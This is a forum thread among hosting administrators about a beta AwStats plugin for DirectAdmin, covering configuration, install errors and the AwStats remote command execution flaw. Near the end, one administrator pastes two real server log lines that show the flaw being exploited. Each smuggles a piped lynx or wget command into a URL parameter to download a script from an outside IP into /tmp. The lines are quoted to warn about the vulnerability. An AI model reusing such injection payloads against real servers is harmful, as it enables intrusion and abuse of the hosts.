AwStats plugin for DA [Still in BETA]

We're getting a lot of sites with leftover .lock files in /var/tmp... they're not going away, and the clients can't get to stats.

These are typically higher usage sites, but I have noticed it on smaller sites as well. the lockfiles exist permanently, until deleted.

Any ideas on streamlining this?
 
fusionictnl said:
Check the main config /usr/local/directadmin/plugins/awstats/hooks/cgi-bin

and there should be some file named: awstats.none.conf

Edit this, and look for a row that says:

EnableLockForUpdate=1

Set this to Zero.

remove all .conf files in the /etc/awstats dir and reinstall on all domains.

Good Luck
 
Thanks for the hint... one more question.

Is awstats.none.conf the default file - so if any changes are made to that file, it'll affect all domains?

Will removing the /etc/awstats conf files have any impact on the users? for instance, wiping their stats, etc?

Thanks for your help on this.

Joe

PS: Just re-read, thats two questions - can you put it on my account? :)
 
Is awstats.none.conf the default file - so if any changes are made to that file, it'll affect all domains?

This is the template that will be used on new activated users


Will removing the /etc/awstats conf files have any impact on the users? for instance, wiping their stats, etc?

Removing the /etc/awstat conf files will not remove any history files these are kept in .txt files in this dir. As specified in first post there's an addidional tool added to the new version wich you can use to reinstall/update/install only on authorized domains. Or just use the script to install on all domains on your server
 
Ok, Great - thank you.

Last comment(s):

1. In the config, you've got this setup:

# Relative or absolute web URL of your awstats icon directory.
# If you build static reports ("... -output > outputpath/output.html"), enter
# path of icon directory relative to the output directory 'outputpath'.
# Example: "/awstatsicon"
# Example: "../icon"
# Default: "/icon" (means you must copy icon directories in "/mywwwroot/icon")
#
DirIcons="http://awstats.sourceforge.net/icon"

If that were changed to a local directory, I imagine execution time would be cut down, correct? Was there a reason that we're calling from SF instead of a local version?

and

2) Did you see this announcement:

AWStats 6.3 final is ready
Fri, 28 Jan 2005 23:06:36

Warning, a security hole was recently found in AWStats versions from 5.0 to 6.2 when AWStats is used as a CGI: A remote user can execute arbitrary commands on your server using permissions of your web server user (in most cases user "nobody").
If you use AWStats with another version or with option AllowToUpdateStatsFromBrowser to 0, you are safe. If not, it is highly recommanded to update to 6.3 version that fix this security hole.

I've got to go back through the above discussion - I missed the part about your update to 6.3 - although I'm pretty sure it was mentioned.

Thank you again for your hard work.

Joe
 
Security leak is fixed in my version and if final is out I will check it will take some time before the new plugin version is ready as my awstats.pl is heavily modified ;) But I will look into it.

Why use sf images, there were a lot of problems with local images permissions and paths when the plugin ran from the panel. I've still forgotten to change this to local images ;) Will be happening in next release! Thx for the notice!
 
error when installing plugin

When i install the awstats plugin, i get the following output

awstats successfully downloaded
Error unpacking /usr/local/directadmin/plugins/awstats/plugin.tar.gz : Error restoring file /usr/local/directadmin/plugins/awstats/plugin.tar.gz :

Is this normal?
 
Perfect - Thank You!!

fusionictnl:

Thank you, thank you, thank you. The script works flawlessly. I installed it after spending about 2hrs trying to get webalizer to wrk (with no sucess).

FYI: DA 1.23.3, Plugin Version 2.0.6, Fedora Core 1.

This was just what I needed!
 
Re: error when installing plugin

GameDNA said:
When i install the awstats plugin, i get the following output



Is this normal?

No that isn't normal. Remove the plugin through the plugin manager or SSH and install it again. Probably the file wasn't correctly downloaded.
 
Last stable version is 6.3 - 2005-01-28 14:33

:)

I would like this integrated please I feel very uneasy using 6.2 on a production server.
 
Chrysalis said:
Last stable version is 6.3 - 2005-01-28 14:33

:)

I would like this integrated please I feel very uneasy using 6.2 on a production server.

Awstats 6.3 was already mentioned and I know it is stable as said in post before.

If you feel uneasy using it don't. If you read the previous post I already mentioned that the security fixes has alread been implemented in my awstats.

I will upgrade it in time, but there are some many customations made to the awstat.pl that this isn't done 1-2-3. So bare with me.

The original awstats does have a lot of bugs in it that I don't like and that in virtual hosting enviroments can lead to others viewing stats that aren't theirs. (Even if pass protected).

So just wait a while. I don't get paid for this and there are other things that are more important ;)
 
http://www.f-secure.com/weblog/
phpBB's web site got compromised, and it is currently unavailable. phpBB is a popular web based discussion system.

According to the statement on their front page at the moment, the intrusion has nothing to do with the phpBB software itself. Instead there is an unconfirmed report that compromise may have been done using a security vulnerability in Awstats instead.

http://www.phpbb.com


At present www.phpbb.com is offline due to a group of politically motivated hackers wishing to use an opensource project to push their agenda ... shame on them.

I will take this opportunity to note that given currently available information this hacking episode does not appear to be due to phpBB itself. Instead a third party application looks to have been the problem. Other sites were attacked at the same time as www.phpbb.com by the same group displaying the same information and in these cases the same third party application has been suggested as the common factor (thus far). Equally we are not aware of any other phpBB boards being attacked and we have not been notified of any valid security issues recently. Obviously we will have more details when we've reviewed just what happened.

We are working to recover the server but this may take some time. Meanwhile users can visit our development board, area51.phpbb.com where they can receive support for phpBB 2.0.x. Of course you can also view the next version of phpBB, 3.0 "Olympus" in the process (minus the new style of course!)

We are also maintaining our IRC support channel, #phpbb on the irc.freenode.net network

We apologise for any problems this may cause our userbase. We obviously take the huge support our community gives phpBB very seriously. And we will do our best to return to "normal operations" just as soon as we can.
 
Host-PC:

The vunerability that awstats currently had found are fixed in the plugin. If there are still vunerabilities I will keep a close watch for it. But still PHPBB always says it is someone elses software that caused problems. As awstats reported that "commands" can be "executed" through awstats. Big sites as that should run in safe mode and with base_dir restriction activated.
 
here's a log entry for a site using your latest plugin:

201.19.155.205 - - [01/Feb/2005:20:46:17 -0500] "GET /awstats/awstats.pl?update=1&logfile=|lynx%20--source%20%20200.141.254.60/dc%20%3E/tmp/dc|&framename=mainleft HTTP/1.1" 200 12122 "http://www.DOMAINREMOVED.com/awstats/awstats.pl?update=1&logfile=|lynx%20--source%20%20200.141.254.60/dc%20%3E/tmp/dc|" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3"


That script wrote a .pl file to /var/tmp - which was perl - and then that file was used to launch a spam attack.

Please - I'm not downing your hard work, I'm just pointing out that there is still a vulnerability.

Until it's fixed, I've had to remove it from all servers.
 
subsequent log entry, from before I disabled it today:

172.180.104.105 - - [06/Feb/2005:13:48:32 -0500] "GET /awstats//awstats.pl?configdir=|echo%20;echo%20__comeco__;%20cd%20/tmp;%20wget%20172.180.104.105/dc.pl%20;echo%20__fim__;echo%20| HTTP/1.1" 200 582 "-" "-"
 
EDIT remove the plugins from the users and REINSTALL IT. (Ex. the extra script included) OR awstats_updateall.php etc.


STEPS

cd /usr/local/directadmin/plugins/awstats/hooks
./awstatsinstall.php -f -a


If you don't update the awstats file than the fix doesn't go away! Can't be more clearly about this/.
 
Last edited:
I think it seems the case you need to integrate 6.3, I dont know how long that will take but it might settle a lot of people's nerves :( I am at the moment considering disabling awstats server wide until I run 6.3.
 
Back
Top